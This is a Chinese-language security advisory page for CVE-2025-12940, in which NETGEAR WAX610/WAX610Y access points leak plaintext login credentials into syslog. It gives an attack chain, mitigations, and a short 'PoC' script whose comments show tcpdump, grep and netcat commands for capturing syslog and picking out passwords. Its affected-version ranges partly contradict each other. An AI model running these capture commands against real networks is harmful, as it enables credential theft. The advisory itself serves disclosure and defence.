IPBUF安全漏洞报告
English
CVE-2025-12940 CVSS 5.5 中危

CVE-2025-12940 NETGEAR WAX610/WAX610Y Syslog凭证泄露漏洞

披露日期: 2025-11-11
来源: a2826606-91e7-4eb6-899e-8484bd4575d5

漏洞信息

漏洞编号
CVE-2025-12940
漏洞类型
凭证泄露
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
NETGEAR WAX610, NETGEAR WAX610Y (AX1800 Dual Band PoE Multi-Gig Insight Managed WiFi 6 Access Points)

相关标签

凭证泄露信息泄露SyslogNETGEARWAX610WAX610YWiFi接入点日志安全CVE-2025-12940网络设备安全

漏洞概述

NETGEAR WAX610和WAX610Y两款WiFi 6接入点在配置Syslog服务器后,存在登录凭证意外记录到日志的安全漏洞。当设备配置了Syslog服务器时,用户的登录凭证会被记录到syslog日志中,任何能够访问syslog服务器的用户都可以读取这些包含凭证信息的日志,从而可能导致未经授权的访问。该漏洞的CVSS评分为5.5,属于中等严重程度,攻击复杂度低,需要低权限,但可能造成高机密性影响。攻击者通过本地访问syslog服务器即可获取明文凭证,无需用户交互。NETGEAR已发布固件更新修复此问题,建议用户尽快升级到最新版本。

技术细节

该漏洞源于NETGEAR WAX610和WAX610Y接入点在处理用户登录认证时,将认证凭证(包括用户名和密码)写入到syslog日志文件中。当管理员配置了远程Syslog服务器用于集中日志管理时,这些敏感凭证信息会通过网络传输到Syslog服务器,并以明文形式存储。攻击者只需获取Syslog服务器的访问权限,即可读取包含完整登录凭证的日志条目。由于CVSS向量显示攻击向量为本地(AV:L),表明攻击者需要能够访问到Syslog服务器或其日志文件。在多租户环境或共享Syslog服务器的场景下,攻击者可能更容易获取其他用户的凭证信息。漏洞影响固件版本10.8.11.4之前的WAX610和WAX610Y设备,修复版本为11.8.0.10或更高版本。

攻击链分析

STEP 1
步骤1
攻击者获取Syslog服务器的访问权限(通过本地访问、网络嗅探或其他方式)
STEP 2
步骤2
攻击者收集NETGEAR WAX610/WAX610Y设备发送的syslog日志
STEP 3
步骤3
攻击者分析日志内容,搜索包含登录凭证的条目(用户名、密码)
STEP 4
步骤4
攻击者提取明文存储的登录凭证信息
STEP 5
步骤5
攻击者使用获取的凭证对WAX610/WAX610Y设备进行未授权访问

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # CVE-2025-12940 PoC - NETGEAR WAX610/WAX610Y Syslog Credential Leak # This PoC demonstrates how to extract credentials from syslog # Configuration SYSLOG_SERVER="192.168.1.100" SYSLOG_PORT="514" # Method 1: Using tcpdump to capture syslog traffic # tcpdump -i any -A 'port 514' | grep -i 'password\|login\|credential' # Method 2: Reading local syslog file (if accessible) # grep -E '(password|login|passwd|credential)' /var/log/syslog # Method 3: Using netcat to receive syslog messages # nc -l -p 514 -u > captured_logs.txt echo "[+] CVE-2025-12940 Syslog Credential Extraction" echo "[+] Target: NETGEAR WAX610/WAX610Y" echo "[+] Method: Analyze syslog for leaked credentials" echo "" echo "Expected log format example:" echo "Nov 11 17:15:39 WAX610 login: username=<user> password=<pass>" echo "" echo "[+] Use grep to search for authentication-related entries:" echo "grep -E 'login|username|password|auth' <syslog_file>"

影响范围

NETGEAR WAX610 < 10.8.11.4
NETGEAR WAX610Y < 10.8.11.4
NETGEAR WAX610 < 11.8.0.10 (未修复版本)
NETGEAR WAX610Y < 11.8.0.10 (未修复版本)

防御指南

临时缓解措施
如果无法立即升级固件,可采取以下临时缓解措施:1) 禁用远程Syslog功能或使用本地日志存储;2) 确保Syslog服务器的网络访问控制,严格限制可访问人员;3) 对现有Syslog日志进行清理,删除可能包含凭证的日志条目;4) 监控Syslog流量,检测异常的认证信息传输;5) 考虑更换已泄露的管理凭证。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表